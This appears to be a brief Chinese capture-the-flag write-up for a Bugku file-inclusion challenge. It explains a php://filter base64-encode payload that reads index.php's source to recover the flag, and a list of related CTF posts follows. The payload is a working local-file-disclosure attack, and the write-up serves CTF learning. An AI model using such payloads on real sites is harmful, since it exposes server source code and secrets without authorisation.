bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
蒲公英eric1 天前
CTFshow misc入门misc8
ctf·misc·图片隐写·ctfshow·图片隐藏
其实防守也摸鱼3 天前
集成开发环境phpStudy安装与配置指南(包含DVWA)
网络·安全·php·web·ctf·工具配置
其实防守也摸鱼4 天前
ctfshow--VIP题目限免(包含原理和知识拓展)前10个
网络·算法·安全·学习笔记·ctf·泄露·web类型
Pure_White_Sword5 天前
[NSSRound#6 Team]void(V1)
网络安全·ctf·reverse·逆向工程
mooyuan天天5 天前
AI大模型辅助Web渗透测试-TRAE智能体自动化解CTF题(命令执行 powershell)
人工智能·web安全·渗透测试·ctf·ai辅助渗透测试
Pure_White_Sword9 天前
[广东省大学生攻防大赛 2022]pyre
网络安全·ctf·reverse·逆向工程
泷羽Sec-静安9 天前
AICTFer一天速成指南
python·sql·ctf
ad禥思妙想10 天前
BUUCTF_刷题记录(二)
ctf
0vvv011 天前
2026-NCTF-web-N-RustPICA
前端·ctf
yv_3012 天前
ssti靶场练习(sstilabs,重庆橘子科技)
ctf·ssti